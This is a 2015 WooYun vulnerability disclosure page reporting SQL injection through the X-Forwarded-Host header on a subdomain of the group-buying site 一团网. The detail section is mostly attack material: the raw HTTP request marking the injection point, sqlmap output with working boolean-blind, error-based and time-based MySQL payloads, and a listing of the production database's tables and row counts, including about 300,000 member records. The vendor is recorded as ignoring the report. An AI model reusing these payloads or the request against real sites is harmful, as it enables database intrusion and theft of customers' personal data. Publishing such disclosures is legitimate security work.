当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0148054

漏洞标题:一团网某站存在SQL注入(涉及近30W用户)

相关厂商:一团网

漏洞作者: 深度安全实验室

提交时间:2015-10-20 16:18

修复时间:2015-10-25 16:20

公开时间:2015-10-25 16:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-20: 细节已通知厂商并且等待厂商处理中
2015-10-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
X-Forwarded-Host: *
Cookie: PHPSESSID=c7479b62fd4ccbc6270dce14b8ceb80e; 28BB_goodsnum=0; Hm_lvt_09d2747522ea08ffa2a908736b5dc25f=1445321841,1445321943; Hm_lpvt_09d2747522ea08ffa2a908736b5dc25f=1445321943; _ga=GA1.2.1778601477.1445321842; _gat=1; HMVT=09d2747522ea08ffa2a908736b5dc25f|1445321852|; HMACCOUNT=7C4ADD99F4AFA2FB
Host: xiaocaocms.etuan.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*

11.png

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: X-Forwarded-Host #1* ((custom) HEADER)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: -1777' OR 7580=7580#
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: -1721' OR 1 GROUP BY CONCAT(0x716b627871,(SELECT (CASE WHEN (9395=9395) THEN 1 ELSE 0 END)),0x71787a7671,FLOOR(RAND(0)*2)) HAVING MIN(0)#
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
Payload: ' AND (SELECT * FROM (SELECT(SLEEP(5)))SWfW)#
---
back-end DBMS: MySQL 5.0.12
Database: etuan_shopnc_db
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| shopnc_message | 310948 |
| shopnc_member | 299818 | //用户
| shopnc_flowstat_1 | 268265 |
| shopnc_sns_visitor | 253128 |
| shopnc_flowstat_3 | 244678 |
| shopnc_flowstat_5 | 239343 |
| shopnc_points_log | 232545 |
| shopnc_flowstat_4 | 223993 |
| shopnc_flowstat_2 | 218631 |
| shopnc_evaluate_goods | 193609 |
| shopnc_order_log | 182730 |
| shopnc_bili_log | 151305 |
| shopnc_voucher | 123408 |
| shopnc_order_goods | 113031 |
| shopnc_order | 112378 | ///订单
| shopnc_voucher_password | 109707 |
| shopnc_ips | 66905 |
| shopnc_predeposit_log | 57816 |
| shopnc_predeposit_log_2 | 53099 |
| shopnc_order_address | 50717 |
| shopnc_evaluate_store | 41325 |
| shopnc_salenum | 25360 |
| shopnc_goods_param | 20607 |
| shopnc_sms_log | 20556 |
| shopnc_address | 20132 |
| shopnc_goods_attr_index | 10308 |
| shopnc_kami | 7920 |
| shopnc_album_pic | 7533 |
| shopnc_goods_spec | 7194 |
| shopnc_weixin_user | 6151 |
| shopnc_cart | 5054 |
| shopnc_goods_spec_index | 4933 |
| shopnc_goods | 4546 |
| shopnc_refund_log | 3549 |
| shopnc_evaluate_goodsstat | 2870 |
| shopnc_bill | 2748 |
| shopnc_predeposit_cash | 2549 |
| shopnc_adv_click | 2423 |
| shopnc_fychoujiang | 2077 |
| shopnc_predeposit_recharge | 1845 |
| shopnc_favorites | 1824 |
| shopnc_zhuanpan | 1520 |
| shopnc_goods_class_staple | 1362 |
| shopnc_gold_log | 1311 |
| shopnc_store_class_goods | 1305 |
| shopnc_goods_group | 1232 |
| shopnc_groupbuy_template | 1220 |
| shopnc_evaluate_storestat | 1185 |
| shopnc_consult | 987 |
| shopnc_p_xianshi_goods | 931 |
| shopnc_album_class | 910 |
| shopnc_mb_user_token | 897 |
| shopnc_sns_albumclass | 885 |
| shopnc_store_extend | 836 |
| shopnc_store | 831 |
| shopnc_complain_goods | 634 |
| shopnc_store_goods_class | 614 |
| shopnc_complain | 597 |
| shopnc_zadan | 492 |
| shopnc_sns_friend | 489 |
| shopnc_sns_albumpic | 446 |
| shopnc_sns_tracelog | 406 |
| shopnc_adv | 360 |
| shopnc_shiming | 339 |
| shopnc_fenxiao_to | 304 |
| shopnc_article | 282 |
| shopnc_attribute_value | 272 |
| shopnc_p_xianshi | 269 |
| shopnc_sns_s_tracelog | 242 |
| shopnc_sns_sharegoods | 231 |
| shopnc_voucher_template | 225 |
| shopnc_adv_position | 191 |
| shopnc_sns_goods | 181 |
| shopnc_gold_buy | 179 |
| shopnc_voucher_quota | 179 |
| shopnc_p_xianshi_quota | 164 |
| shopnc_tuijian | 147 |
| shopnc_p_xianshi_apply | 141 |
| shopnc_goodsyuding | 131 |
| shopnc_setting | 130 |
| shopnc_voucher_apply | 122 |
| shopnc_goods_class | 115 |
| shopnc_return_goods | 113 |
| shopnc_return | 112 |
| shopnc_store_class | 92 |
| shopnc_recommend_goods | 88 |
| shopnc_cards | 78 |
| shopnc_goods_class_tag | 77 |
| shopnc_store_watermark | 72 |
| shopnc_activity_detail | 58 |
| shopnc_web_code | 56 |
| shopnc_map | 54 |
| shopnc_daddress | 52 |
| shopnc_link | 51 |
| shopnc_spec_value | 48 |
| shopnc_express | 47 |
| shopnc_brand | 44 |
| shopnc_attribute | 28 |
| shopnc_voucher_price | 28 |
| shopnc_complain_talk | 27 |
| shopnc_p_mansong_rule | 27 |
| shopnc_pd_log | 26 |
| shopnc_mail_msg_temlates | 24 |
| shopnc_p_mansong | 24 |
| shopnc_sns_mtagmember | 24 |
| shopnc_points_order | 23 |
| shopnc_points_orderaddress | 23 |
| shopnc_points_ordergoods | 23 |
| shopnc_points_cart | 22 |
| shopnc_store_gradelog | 20 |
| shopnc_admin | 17 |
| shopnc_huida | 17 |
| shopnc_upload | 17 |
| shopnc_rec_position | 16 |
| shopnc_sns_setting | 16 |
| shopnc_jiangpin | 14 |
| shopnc_seo | 14 |
| shopnc_coupon | 13 |
| shopnc_p_mansong_apply | 13 |
| shopnc_p_mansong_quota | 13 |
| shopnc_points_goods | 13 |
| shopnc_recommend | 13 |
| shopnc_payment | 11 |
| shopnc_type | 11 |
| shopnc_type_spec | 11 |
| shopnc_article_class | 9 |
| shopnc_web | 8 |
| shopnc_mb_home | 7 |
| shopnc_spec | 7 |
| shopnc_fenxiaotxlog | 6 |
| shopnc_gold_payment | 6 |
| shopnc_document | 5 |
| shopnc_groupbuy_class | 5 |
| shopnc_groupbuy_price_range | 5 |
| shopnc_complain_subject | 4 |
| shopnc_inform_subject | 4 |
| shopnc_mb_ad | 4 |
| shopnc_store_grade | 4 |
| shopnc_wenti | 4 |
| shopnc_navigation | 3 |
| shopnc_sns_s_autosetting | 3 |
| shopnc_common_cron | 2 |
| shopnc_inform | 2 |
| shopnc_p_bundling_quota | 2 |
| shopnc_pages | 2 |
| shopnc_sns_comment | 2 |
| shopnc_sns_sharestore | 2 |
| shopnc_transport_extend | 2 |
| shopnc_activity | 1 |
| shopnc_coupon_class | 1 |
| shopnc_groupbuy_area | 1 |
| shopnc_inform_subject_type | 1 |
| shopnc_sns_membertag | 1 |
| shopnc_transport | 1 |
+-----------------------------+---------+

33.png

漏洞证明:

修复方案:

版权声明:转载请注明来源 深度安全实验室@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-10-25 16:20

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论